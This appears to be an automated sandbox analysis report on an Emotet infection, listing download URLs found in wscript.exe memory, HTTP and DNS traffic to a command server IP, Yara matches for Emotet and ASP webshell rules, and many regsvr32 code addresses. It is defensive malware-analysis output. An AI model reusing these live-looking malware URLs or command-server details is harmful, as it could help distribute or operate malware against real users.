Source: wscript.exe, 0000000A.00000002.354161417.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333487031.00000000054C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.332982152.00000000054C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334262935.00000000054CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/R
Source: wscript.exe, 0000000A.00000002.353943277.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329874156.00000000030BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353230721.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.328965636.00000000030AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/o
Source: wscript.exe, 0000000A.00000003.337986785.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334135815.0000000005548000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338584714.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.352714501.0000000005568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333720815.000000000552F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337774489.000000000555B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337632623.0000000005554000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/ocal
Source: wscript.exe, 0000000A.00000003.350604005.0000000005120000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
Source: wscript.exe, wscript.exe, 0000000A.00000003.344517254.000000000571B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329234815.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330874377.0000000003109000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338612910.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353199405.00000000058CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349921274.00000000058C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354171415.00000000054D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338364395.000000000557B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333126963.0000000005483000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338711188.0000000005646000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340959551.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329158898.000000000310E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333630424.00000000054AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337986785.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354280215.0000000005862000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334232531.0000000005535000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.000000000561C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.000000000591E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349970561.0000000005899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331782249.00000000053E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
Source: wscript.exe, 0000000A.00000003.353391125.0000000003093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.353921759.0000000003094000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/w11798
Source: wscript.exe, 0000000A.00000003.350604005.0000000005120000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
Source: wscript.exe, wscript.exe, 0000000A.00000003.344517254.000000000571B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329234815.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330874377.0000000003109000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338612910.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353199405.00000000058CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349921274.00000000058C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354171415.00000000054D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338364395.000000000557B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333126963.0000000005483000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338711188.0000000005646000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340959551.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329158898.000000000310E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333630424.00000000054AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337986785.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354280215.0000000005862000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334232531.0000000005535000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.000000000561C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.000000000591E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349970561.0000000005899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331782249.00000000053E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gomespontes.com.br/logs/pd/
Source: wscript.exe, 0000000A.00000003.350604005.0000000005120000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM
Source: wscript.exe, 0000000A.00000002.353779744.0000000003060000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gomespontes.com.br/logs/pd/windic2

Source: unknown

HTTP traffic detected: POST /wviitvvypaw/exnwmeb/fqgitydelxiavmv/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56

Source: unknown

DNS traffic detected: queries for: penshorn.org

Source: global traffic

HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org

Source: unknown	HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.7:49708 version: TLS 1.2

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 0000000D.00000002.572082302.000000000107B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 13.2.regsvr32.exe.1010000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.1010000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.571771558.0000000001041000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.327461788.0000000000590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.571413418.0000000001010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Source: 0000000A.00000003.350591261.00000000056C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Source: 0000000A.00000003.350591261.00000000056C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Source: 0000000A.00000003.340162075.00000000056C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Source: 0000000A.00000003.340162075.00000000056C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Source: 0000000A.00000003.339776726.00000000056BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Source: 0000000A.00000003.339776726.00000000056BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Source: 0000000A.00000002.354227381.00000000056C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Source: 0000000A.00000003.341613942.00000000056C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Source: 0000000A.00000003.341613942.00000000056C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Source: 0000000A.00000003.349899661.000000000588F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06

Source: C:\Windows\System32\regsvr32.exe

File created: C:\Windows\system32\BqnZyHskpeTuo\

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180006818	12_2_0000000180006818
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_000000018000B878	12_2_000000018000B878
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180007110	12_2_0000000180007110
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180008D28	12_2_0000000180008D28
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180014555	12_2_0000000180014555
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_00580000	12_2_00580000
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CCC14	12_2_005CCC14
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DA000	12_2_005DA000
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D709C	12_2_005D709C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C7D6C	12_2_005C7D6C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C263C	12_2_005C263C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C8BC8	12_2_005C8BC8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D8FC8	12_2_005D8FC8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DC058	12_2_005DC058
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005E5450	12_2_005E5450
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DC44C	12_2_005DC44C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C7840	12_2_005C7840
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CB07C	12_2_005CB07C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C2C78	12_2_005C2C78
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CC078	12_2_005CC078
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CD474	12_2_005CD474
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D6C70	12_2_005D6C70
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DB460	12_2_005DB460
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005E181C	12_2_005E181C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C9408	12_2_005C9408
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C7C08	12_2_005C7C08
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C1000	12_2_005C1000
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CB83C	12_2_005CB83C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D1030	12_2_005D1030
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DEC30	12_2_005DEC30
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C18DC	12_2_005C18DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C14D4	12_2_005C14D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D3CD4	12_2_005D3CD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C80CC	12_2_005C80CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D08CC	12_2_005D08CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CF8C4	12_2_005CF8C4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D5CC4	12_2_005D5CC4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C48FC	12_2_005C48FC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C90F8	12_2_005C90F8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C3CF4	12_2_005C3CF4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D20E0	12_2_005D20E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CAC94	12_2_005CAC94
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C4C84	12_2_005C4C84
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DCC84	12_2_005DCC84
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D5880	12_2_005D5880
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005E94BC	12_2_005E94BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CDCB8	12_2_005CDCB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DA8B0	12_2_005DA8B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C98AC	12_2_005C98AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D7518	12_2_005D7518
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005E9910	12_2_005E9910
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D610C	12_2_005D610C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005E8500	12_2_005E8500
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C6138	12_2_005C6138
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C7530	12_2_005C7530
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DB130	12_2_005DB130
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DAD28	12_2_005DAD28
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D1924	12_2_005D1924
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D4D20	12_2_005D4D20
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D15C8	12_2_005D15C8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DD5F0	12_2_005DD5F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C95BC	12_2_005C95BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DBDA0	12_2_005DBDA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CF65C	12_2_005CF65C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CB258	12_2_005CB258
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DA244	12_2_005DA244
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C3274	12_2_005C3274
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D0A70	12_2_005D0A70
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CA660	12_2_005CA660
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C461C	12_2_005C461C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C4214	12_2_005C4214
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C3E0C	12_2_005C3E0C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D020C	12_2_005D020C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D8E08	12_2_005D8E08
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D5A00	12_2_005D5A00
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005E8A00	12_2_005E8A00
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CBA2C	12_2_005CBA2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D8A2C	12_2_005D8A2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D0E2C	12_2_005D0E2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D662C	12_2_005D662C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D96D4	12_2_005D96D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CD6CC	12_2_005CD6CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DEAC0	12_2_005DEAC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C92F0	12_2_005C92F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CBE90	12_2_005CBE90
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D4A90	12_2_005D4A90
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C8A8C	12_2_005C8A8C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005E4E8C	12_2_005E4E8C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C3ABC	12_2_005C3ABC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DA6BC	12_2_005DA6BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CAAB8	12_2_005CAAB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C4EB8	12_2_005C4EB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C975C	12_2_005C975C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C4758	12_2_005C4758
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DE750	12_2_005DE750
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CF77C	12_2_005CF77C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C8378	12_2_005C8378
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DD770	12_2_005DD770
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DCF70	12_2_005DCF70
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D4F18	12_2_005D4F18
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CEF14	12_2_005CEF14
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D3B14	12_2_005D3B14
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DE310	12_2_005DE310
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CD33C	12_2_005CD33C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C2FD4	12_2_005C2FD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C33D4	12_2_005C33D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D3FD0	12_2_005D3FD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D97CC	12_2_005D97CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CA7F0	12_2_005CA7F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005E27EC	12_2_005E27EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C1B94	12_2_005C1B94
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D5384	12_2_005D5384
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CFFB8	12_2_005CFFB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D8BB8	12_2_005D8BB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C8FB0	12_2_005C8FB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CDBA0	12_2_005CDBA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01000000	13_2_01000000
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01047D6C	13_2_01047D6C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104CC14	13_2_0104CC14
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010508CC	13_2_010508CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01049B79	13_2_01049B79
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010463A4	13_2_010463A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010673A4	13_2_010673A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01048BC8	13_2_01048BC8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01058FC8	13_2_01058FC8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01053FD0	13_2_01053FD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01060618	13_2_01060618
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010576A8	13_2_010576A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01068500	13_2_01068500
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01062100	13_2_01062100
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105610C	13_2_0105610C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01069910	13_2_01069910
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01057518	13_2_01057518
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01051924	13_2_01051924
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01054D20	13_2_01054D20
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105AD28	13_2_0105AD28
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105B130	13_2_0105B130
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01046138	13_2_01046138
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01064D64	13_2_01064D64
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105BDA0	13_2_0105BDA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010495BC	13_2_010495BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010515C8	13_2_010515C8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105D5F0	13_2_0105D5F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01041000	13_2_01041000
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105A000	13_2_0105A000
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01049408	13_2_01049408
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01047C08	13_2_01047C08
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01047410	13_2_01047410
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0106181C	13_2_0106181C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01051030	13_2_01051030
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105EC30	13_2_0105EC30
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104B83C	13_2_0104B83C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01047840	13_2_01047840
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105C44C	13_2_0105C44C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01065450	13_2_01065450
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105C058	13_2_0105C058
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105B460	13_2_0105B460
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01065868	13_2_01065868
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104D474	13_2_0104D474
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01056C70	13_2_01056C70
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104B07C	13_2_0104B07C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01042C78	13_2_01042C78
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104C078	13_2_0104C078
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01044C84	13_2_01044C84
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105CC84	13_2_0105CC84
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01055880	13_2_01055880
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0106488C	13_2_0106488C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104AC94	13_2_0104AC94
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01061494	13_2_01061494
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105709C	13_2_0105709C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010498AC	13_2_010498AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010644A8	13_2_010644A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105A8B0	13_2_0105A8B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010694BC	13_2_010694BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104DCB8	13_2_0104DCB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104F8C4	13_2_0104F8C4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01055CC4	13_2_01055CC4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010480CC	13_2_010480CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010414D4	13_2_010414D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01053CD4	13_2_01053CD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01061CD4	13_2_01061CD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010418DC	13_2_010418DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010520E0	13_2_010520E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01043CF4	13_2_01043CF4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010448FC	13_2_010448FC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010490F8	13_2_010490F8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104EF14	13_2_0104EF14
